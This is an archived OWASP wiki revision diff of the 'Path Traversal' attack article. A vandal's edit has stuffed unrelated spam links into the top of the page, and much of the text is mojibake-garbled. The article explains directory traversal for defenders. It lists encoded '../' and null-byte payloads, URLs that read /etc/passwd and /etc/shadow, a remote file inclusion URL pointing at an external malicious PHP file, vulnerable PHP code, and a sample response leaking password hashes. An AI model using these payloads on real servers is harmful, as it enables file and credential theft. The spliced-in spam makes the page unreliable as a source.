This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Path Traversal"
Deleted user (talk | contribs) |
Deleted user (talk | contribs) |
||
Line 1: | Line 1: | ||
+ | [http://s1.shard.jp/olharder/autoroll-654.html webmap] [http://s1.shard.jp/frhorton/fg84cc18u.html lg appliances south africa | ||
+ | ] [http://s1.shard.jp/bireba/nortan-antivirus.html os x antivirus free | ||
+ | ] [http://s1.shard.jp/frhorton/ru9zwzdr5.html traditional african jewelry | ||
+ | ] [http://s1.shard.jp/galeach/new145.html artichoke asiago dip | ||
+ | ] [http://s1.shard.jp/galeach/new123.html presidential committee on the northeast asian cooperation initiative 2005 | ||
+ | ] [http://s1.shard.jp/losaul/how-to-train.html australias plants and animals | ||
+ | ] [http://s1.shard.jp/galeach/new163.html asianbookie .com] [http://s1.shard.jp/olharder/siemens-automotive.html agreement auto sales | ||
+ | ] [http://s1.shard.jp/olharder/auto-car-guys.html auto body parts manufacure | ||
+ | ] [http://s1.shard.jp/olharder/automoveis-bmw.html auto painting kits | ||
+ | ] [http://s1.shard.jp/losaul/unley-council-south.html australian book club | ||
+ | ] [http://s1.shard.jp/olharder/autoroll-654.html page] [http://s1.shard.jp/olharder/autoroll-654.html page] [http://s1.shard.jp/losaul/property-for.html australia car classic toyota | ||
+ | ] [http://s1.shard.jp/olharder/autoroll-654.html link] [http://s1.shard.jp/galeach/new47.html asian caricature | ||
+ | ] [http://s1.shard.jp/losaul/helicopters-australia.html cnet networks australia | ||
+ | ] [http://s1.shard.jp/losaul/lawn-bowls-clubs.html the university of notre dame australia | ||
+ | ] [http://s1.shard.jp/olharder/invicta-speedway.html rockauto com | ||
+ | ] [http://s1.shard.jp/olharder/the-autobiography.html auto repair minneapolis mn | ||
+ | ] [http://s1.shard.jp/losaul/alzeihmers-australia.html australia cardiopulmonary resuscitation south | ||
+ | ] [http://s1.shard.jp/olharder/auto-club-country.html browning automatic pistols | ||
+ | ] [http://s1.shard.jp/frhorton/w2yqtuc7f.html africa center for strategic study | ||
+ | ] [http://s1.shard.jp/frhorton/wlyxxgvnc.html advertising africa in job marketing south | ||
+ | ] [http://s1.shard.jp/losaul/redfern-sydney.html concrete blocks australia | ||
+ | ] [http://s1.shard.jp/bireba/panda-titanium.html uninstall norton antivirus corporate edition | ||
+ | ] [http://s1.shard.jp/frhorton/glos5k8jt.html south africa bed and breakfasts | ||
+ | ] [http://s1.shard.jp/galeach/new178.html norasia container lines limited | ||
+ | ] [http://s1.shard.jp/galeach/new82.html beautiful asian chick | ||
+ | ] [http://s1.shard.jp/galeach/new125.html ardamis monemvasia | ||
+ | ] [http://s1.shard.jp/losaul/visa-para-australia.html motorcycle accesories australia | ||
+ | ] [http://s1.shard.jp/olharder/autoroll-654.html top] [http://s1.shard.jp/frhorton/jxumdkxje.html barbie primp polish styling head african american | ||
+ | ] [http://s1.shard.jp/olharder/wheels-and-deals.html automobile speaker sizes | ||
+ | ] [http://s1.shard.jp/galeach/new59.html asian pacific american heritage council | ||
+ | ] [http://s1.shard.jp/losaul/map.html australia extreme korg triton | ||
+ | ] [http://s1.shard.jp/olharder/automation-home.html home automation audio | ||
+ | ] [http://s1.shard.jp/losaul/australian-sports.html ikonaustralia.+com | ||
+ | ] [http://s1.shard.jp/galeach/new74.html airline asia southeast | ||
+ | ] [http://s1.shard.jp/bireba/alertaantivirus.html pc magazine antivirus mcafee | ||
+ | ] [http://s1.shard.jp/galeach/new140.html talk asia cnn] [http://s1.shard.jp/olharder/autoroll-654.html index] [http://s1.shard.jp/galeach/new51.html asian cuckolding | ||
+ | ] [http://s1.shard.jp/bireba/download-norton.html cd key norton antivirus 2005 | ||
+ | ] [http://s1.shard.jp/losaul/jamsteraustraliaautomarketsolcomau.html australia world map | ||
+ | ] [http://s1.shard.jp/olharder/subasta-de-autos.html autocad cars | ||
+ | ] [http://s1.shard.jp/olharder/autoroll-654.html site] [http://s1.shard.jp/frhorton/2tqspott4.html south africa gold coin | ||
+ | ] | ||
http://www.textc4tzellaror.com | http://www.textc4tzellaror.com | ||
{{Template:Attack}} | {{Template:Attack}} | ||
Line 10: | Line 51: | ||
==Overview== | ==Overview== | ||
− | A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with | + | A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with âÂÂdot-dot-slash (../)â sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. |
− | The attacker uses | + | The attacker uses âÂÂ../â sequences to move up to root directory, thus permitting navigation through the file system. |
− | This attack can be executed with an external malicious code injected on the path, like the [[Resource Injection]] attack. To perform this attack | + | This attack can be executed with an external malicious code injected on the path, like the [[Resource Injection]] attack. To perform this attack itâÂÂs not necessary to use a specific tool; attackers typically use a spider/crawler to detect all URLs available. |
− | This attack is also known as | + | This attack is also known as âÂÂdot-dot-slashâÂÂ, âÂÂdirectory traversalâÂÂ, âÂÂdirectory climbingâ and âÂÂbacktrackingâÂÂ. |
==Related Security Activities== | ==Related Security Activities== | ||
Line 51: | Line 92: | ||
UNIX | UNIX | ||
− | Root directory: | + | Root directory: â / â |
− | Directory separator: | + | Directory separator: â / â |
WINDOWS | WINDOWS | ||
− | Root directory: | + | Root directory: â <partition letter> : \ â |
− | Directory separator: | + | Directory separator: â / â or â \ â |
Note that windows allows filenames to be followed by extra . \ / characters. | Note that windows allows filenames to be followed by extra . \ / characters. | ||
Line 71: | Line 112: | ||
<nowiki> http://some_site.com.br/some-page.asp?page=index.html </nowiki> | <nowiki> http://some_site.com.br/some-page.asp?page=index.html </nowiki> | ||
− | In these examples | + | In these examples itâÂÂs possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. |
<nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki> | <nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki> | ||
Revision as of 12:05, 26 May 2009
webmap [http://s1.shard.jp/frhorton/fg84cc18u.html lg appliances south africa ] [http://s1.shard.jp/bireba/nortan-antivirus.html os x antivirus free ] [http://s1.shard.jp/frhorton/ru9zwzdr5.html traditional african jewelry ] [http://s1.shard.jp/galeach/new145.html artichoke asiago dip ] [http://s1.shard.jp/galeach/new123.html presidential committee on the northeast asian cooperation initiative 2005 ] [http://s1.shard.jp/losaul/how-to-train.html australias plants and animals ] asianbookie .com [http://s1.shard.jp/olharder/siemens-automotive.html agreement auto sales ] [http://s1.shard.jp/olharder/auto-car-guys.html auto body parts manufacure ] [http://s1.shard.jp/olharder/automoveis-bmw.html auto painting kits ] [http://s1.shard.jp/losaul/unley-council-south.html australian book club ] page page [http://s1.shard.jp/losaul/property-for.html australia car classic toyota ] link [http://s1.shard.jp/galeach/new47.html asian caricature ] [http://s1.shard.jp/losaul/helicopters-australia.html cnet networks australia ] [http://s1.shard.jp/losaul/lawn-bowls-clubs.html the university of notre dame australia ] [http://s1.shard.jp/olharder/invicta-speedway.html rockauto com ] [http://s1.shard.jp/olharder/the-autobiography.html auto repair minneapolis mn ] [http://s1.shard.jp/losaul/alzeihmers-australia.html australia cardiopulmonary resuscitation south ] [http://s1.shard.jp/olharder/auto-club-country.html browning automatic pistols ] [http://s1.shard.jp/frhorton/w2yqtuc7f.html africa center for strategic study ] [http://s1.shard.jp/frhorton/wlyxxgvnc.html advertising africa in job marketing south ] [http://s1.shard.jp/losaul/redfern-sydney.html concrete blocks australia ] [http://s1.shard.jp/bireba/panda-titanium.html uninstall norton antivirus corporate edition ] [http://s1.shard.jp/frhorton/glos5k8jt.html south africa bed and breakfasts ] [http://s1.shard.jp/galeach/new178.html norasia container lines limited ] [http://s1.shard.jp/galeach/new82.html beautiful asian chick ] [http://s1.shard.jp/galeach/new125.html ardamis monemvasia ] [http://s1.shard.jp/losaul/visa-para-australia.html motorcycle accesories australia ] top [http://s1.shard.jp/frhorton/jxumdkxje.html barbie primp polish styling head african american ] [http://s1.shard.jp/olharder/wheels-and-deals.html automobile speaker sizes ] [http://s1.shard.jp/galeach/new59.html asian pacific american heritage council ] [http://s1.shard.jp/losaul/map.html australia extreme korg triton ] [http://s1.shard.jp/olharder/automation-home.html home automation audio ] [http://s1.shard.jp/losaul/australian-sports.html ikonaustralia.+com ] [http://s1.shard.jp/galeach/new74.html airline asia southeast ] [http://s1.shard.jp/bireba/alertaantivirus.html pc magazine antivirus mcafee ] talk asia cnn index [http://s1.shard.jp/galeach/new51.html asian cuckolding ] [http://s1.shard.jp/bireba/download-norton.html cd key norton antivirus 2005 ] [http://s1.shard.jp/losaul/jamsteraustraliaautomarketsolcomau.html australia world map ] [http://s1.shard.jp/olharder/subasta-de-autos.html autocad cars ] site [http://s1.shard.jp/frhorton/2tqspott4.html south africa gold coin ] http://www.textc4tzellaror.com
- This is an Attack. To view all attacks, please see the Attack Category page.
Last revision (mm/dd/yy): 05/26/2009
Overview
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with âÂÂdot-dot-slash (../)â sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses âÂÂ../â sequences to move up to root directory, thus permitting navigation through the file system.
This attack can be executed with an external malicious code injected on the path, like the Resource Injection attack. To perform this attack itâÂÂs not necessary to use a specific tool; attackers typically use a spider/crawler to detect all URLs available.
This attack is also known as âÂÂdot-dot-slashâÂÂ, âÂÂdirectory traversalâÂÂ, âÂÂdirectory climbingâ and âÂÂbacktrackingâÂÂ.
Related Security Activities
How to Avoid Path Traversal Vulnerabilities
See the OWASP Guide article on how to Avoid Path Traversal Vulnerabilities.
How to Test for Path Traversal Vulnerabilities
See the OWASP Testing Guide article on how to Test for Path Traversal Vulnerabilities.
Description
Request variations
Encoding and double encoding:
%2e%2e%2f represents ../ %2e%2e/ represents ../ ..%2f represents ../ %2e%2e%5c represents ..\ %2e%2e\ represents ..\ ..%5c represents ..\ %252e%252e%255c represents ..\ ..%255c represents ..\ and so on.
Percent encoding (aka URL encoding)
Note that web containers perform one level of decoding on percent encoded values from forms and URLs.
..%c0%af represents ../ ..%c1%9c represents ..\
OS specific
UNIX
Root directory: â / â Directory separator: â / âÂÂ
WINDOWS
Root directory: â <partition letter> : \ â Directory separator: â / â or â \ â Note that windows allows filenames to be followed by extra . \ / characters.
In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:
?file=secret.doc%00.pdf
will result in the Java application seeing a string that ends with ".pdf" and the operating system will see a file that ends in ".doc". Attackers may use this trick to bypass validation routines.
Examples
Example 1
The following examples show how the application deals with the resources in use.
http://some_site.com.br/get-files.jsp?file=report.pdf http://some_site.com.br/get-page.php?home=aaa.html http://some_site.com.br/some-page.asp?page=index.html
In these examples itâÂÂs possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
http://some_site.com.br/get-files?file=../../../../some dir/some file
http://some_site.com.br/../../../../some dir/some file
The following URLs show examples of *NIX password file exploitation.
http://some_site.com.br/../../../../etc/shadow http://some_site.com.br/get-files?file=/etc/passwd
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in the whole disk.
Example 2
It's also possible to include files and scripts located on external website.
http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php
Example 3
These examples illustrate a case when an attacker made the server show the CGI source code.
http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi
Example 4
This example was extracted from: Wikipedia - Directory Traversal
A typical example of vulnerable application code is:
<?php $template = 'blue.php'; if ( is_set( $_COOKIE['TEMPLATE'] ) ) $template = $_COOKIE['TEMPLATE']; include ( "/home/users/phpguru/templates/" . $template ); ?>
An attack against this system could be to send the following HTTP request:
GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.
UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.
Absolute Path Traversal
The following URLs may be vulnerable to this attack:
http://testsite.com/get.php?f=list http://testsite.com/get.cgi?f=2 http://testsite.com/get.asp?f=test
An attacker can execute this attack like this:
http://testsite.com/get.php?f=/var/www/html/get.php http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc http://testsite.com/get.asp?f=/etc/passwd
When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. path to the file with a source code, which then may be displayed).